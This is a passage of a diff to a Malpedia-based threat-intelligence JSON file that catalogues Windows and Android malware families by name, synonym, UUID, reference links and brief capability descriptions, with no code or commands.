"81157066-c2f6-4625-8070-c0a793d57e18", - "value": "yayih", - "description": "" - }, - { - "meta": { - "synonyms": [ - "DarkShare" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus", - "https://www.youtube.com/watch?v=AUGxYhE_CUY" - ] - }, - "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", - "value": "YoungLotus", - "description": "Simple malware with proxy/RDP and download capabilities. 
It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", - "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", - "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" - ] - }, - "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", - "value": "yty", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Zekapab" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" - ] - }, - "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", - "value": "Zebrocy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" - ] - }, - "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", - "value": "Zebrocy (AutoIT)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" - ] - }, - "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", - "value": "Zedhou", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Max++", - "Smiscer" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", - "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/", - 
"https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
- "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
- "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
- "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html"
- ]
- },
- "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7",
- "value": "ZeroAccess",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil",
- "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/",
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil"
- ]
- },
- "uuid": "585f9f75-1239-4561-8815-c5ae033053a1",
- "value": "ZeroEvil",
- "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. 
Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n"
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot",
- "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
- ]
- },
- "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c",
- "value": "ZeroT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Zbot"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus",
- "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html",
- "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
- "https://www.secureworks.com/research/zeus?threat=zeus",
- "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
- "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
- "https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
- "http://eternal-todo.com/blog/zeus-spreading-facebook",
- "http://eternal-todo.com/blog/new-zeus-binary",
- "http://eternal-todo.com/blog/detecting-zeus",
- "https://www.mnin.org/write/ZeusMalware.pdf",
- "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html",
- "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html",
- "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
- "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
- "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
- "https://zeustracker.abuse.ch/monitor.php",
- "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html"
- ]
- },
- "uuid": 
"4e8c1ab7-2841-4823-a5d1-39284fb0969a",
- "value": "Zeus",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer"
- ]
- },
- "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3",
- "value": "Zeus MailSniffer",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx",
- "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/",
- "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/",
- "https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/"
- ]
- },
- "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4",
- "value": "Zeus Sphinx",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_ssl"
- ]
- },
- "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0",
- "value": "Zeus SSL",
- "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin",
- "https://twitter.com/siri_urz/status/923479126656323584",
- "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877"
- ]
- },
- "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f",
- "value": "Zezin",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat",
- "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
- },
- "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614",
- "value": "ZhCat",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz",
- "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
- },
- "uuid": "989330e9-52da-4489-888b-686429db3a45",
- "value": "ZhMimikatz",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Zeus Terdot"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader",
- "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
- "https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/",
- "https://www.arbornetworks.com/blog/asert/great-dga-sphinx/"
- ]
- },
- "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed",
- "value": "Zloader",
- "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor."
- },
- {
- "meta": {
- "synonyms": [
- "gresim"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng",
- "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf"
- ]
- },
- "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7",
- "value": "ZoxPNG",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Sensocode"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell",
- "https://blogs.cisco.com/security/talos/opening-zxshell",
- "https://blogs.rsa.com/cat-phishing/",
- "https://github.com/smb01/zxshell"
- ]
- },
- "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15",
- "value": "ZXShell",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon",
- "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html"
- ]
- },
- "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722",
- "value": "Zyklon",
- "description": ""
- }
- ],
- "version": 1649,
- "source": "Malpedia",
- "name": "Malpedia",
- "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e"
+ "description": "Malware galaxy cluster based on Malpedia.",
+ "type": "malpedia",
+ "authors": [
+ "Daniel Plohmann",
+ "Steffen Enders",
+ "Andrea Garavaglia",
+ "Davide Arcuri"
+ ],
+ "values": [
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine",
+ "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/"
+ ]
+ },
+ "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d",
+ "value": "AdultSwine",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat",
+ "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html",
+ 
"https://github.com/DesignativeDave/androrat"
+ ]
+ },
+ "uuid": "80447111-8085-40a4-a052-420926091ac6",
+ "value": "AndroRAT",
+ "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/",
+ "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf"
+ ]
+ },
+ "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184",
+ "value": "AnubisSpy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut",
+ "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
+ "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/"
+ ]
+ },
+ "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9",
+ "value": "Bahamut",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot",
+ "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
+ "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
+ "http://blog.koodous.com/2017/05/bankbot-on-google-play.html",
+ "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
+ 
"https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/"
+ ]
+ },
+ "uuid": "85975621-5126-40cb-8083-55cbfa75121b",
+ "value": "BankBot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites",
+ "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang",
+ "https://www.youtube.com/watch?v=1LOy0ZyjEOk"
+ ]
+ },
+ "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6",
+ "value": "Catelites",
+ "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger",
+ "http://blog.checkpoint.com/2017/01/24/charger-malware/",
+ "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html"
+ ]
+ },
+ "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561",
+ "value": "Charger",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Pegasus",
+ "JigglyPuff"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor",
+ "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
+ "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://media.ccc.de/v/33c3-7901-pegasus_internals",
+ "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/"
+ ]
+ },
+ "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad",
+ "value": "Chrysaor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor",
+ "https://twitter.com/LukasStefanko/status/1042297855602503681"
+ ]
+ },
+ "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724",
+ "value": "Clientor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "SpyBanker"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic",
+ "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/"
+ ]
+ },
+ "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a",
+ "value": "Connic",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/"
+ ]
+ },
+ "uuid": 
"8a42a699-1746-498b-a558-e7113bb916c0",
+ "value": "Cpuminer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker",
+ "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/"
+ ]
+ },
+ "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c",
+ "value": "DoubleLocker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy",
+ "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
+ ]
+ },
+ "uuid": "8269e779-db23-4c94-aafb-36ee94879417",
+ "value": "DualToy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap",
+ "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/"
+ ]
+ },
+ "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b",
+ "value": "Dvmap",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot",
+ "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/"
+ ]
+ },
+ "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd",
+ "value": "ExoBot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy",
+ "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
+ ]
+ },
+ "uuid": "4305d59a-0d07-4021-a902-e7996378898b",
+ "value": "FlexiSpy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "gugi"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet",
+ "https://twitter.com/LukasStefanko/status/886849558143279104"
+ ]
+ },
+ "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f",
+ "value": "FlexNet",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/"
+ ]
+ },
+ "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5",
+ "value": "GhostCtrl",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove",
+ "https://www.clearskysec.com/glancelove/",
+ "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773",
+ "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/",
+ "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
+ "https://www.ci-project.org/blog/2017/3/4/arid-viper"
+ ]
+ },
+ "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49",
+ "value": "GlanceLove",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat",
+ "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/"
+ ]
+ },
+ "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6",
+ "value": "HeroRAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat",
+ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
+ ]
+ },
+ "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf",
+ "value": "IRRat",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat",
+ "https://blog.lookout.com/mobile-threat-jaderat"
+ ]
+ },
+ "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0",
+ "value": "JadeRAT",
+ 
"description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid",
+ "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html",
+ "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/"
+ ]
+ },
+ "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0",
+ "value": "KevDroid",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler",
+ "https://twitter.com/LukasStefanko/status/928262059875213312"
+ ]
+ },
+ "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3",
+ "value": "Koler",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/"
+ ]
+ },
+ "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0",
+ "value": "Lazarus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990"
+ ]
+ },
+ "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c",
+ "value": "Lazarus ELF Backdoor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki",
+ "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/"
+ ]
+ },
+ "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f",
+ "value": "Loki",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot",
+ "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html"
+ ]
+ },
+ 
"uuid": "4793a29b-1191-4750-810e-9301a6576fc4",
+ "value": "LokiBot",
+ "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot."
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "ExoBot"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher",
+ "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
+ "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
+ "https://www.clientsidedetection.com/marcher.html",
+ "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html"
+ ]
+ },
+ "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e",
+ "value": "Marcher",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot",
+ "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/",
+ "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html"
+ ]
+ },
+ "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826",
+ "value": "MazarBot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot",
+ "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html"
+ ]
+ },
+ "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde",
+ "value": "MysteryBot",
+ "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat",
+ "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/",
+ "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co"
+ ]
+ },
+ "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5",
+ "value": "OmniRAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Popr-d30"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30",
+ "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/",
+ "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/"
+ ]
+ },
+ "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf",
+ "value": "X-Agent",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub"
+ ]
+ },
+ "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616",
+ "value": "Fake Pornhub",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir",
+ "https://twitter.com/PhysicalDrive0/statuses/798825019316916224"
+ ]
+ },
+ "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef",
+ "value": "Raxir",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2",
+ "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores"
+ ]
+ },
+ "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f",
+ "value": "RedAlert2",
+ "description": "RedAlert 2 is 
an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe",
+ "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/",
+ "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html",
+ "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html",
+ "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html",
+ "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
+ "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html"
+ ]
+ },
+ "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777",
+ "value": "Retefe",
+ "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis",
+ "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/",
+ "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/"
+ ]
+ },
+ "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82",
+ "value": "Roaming Mantis",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
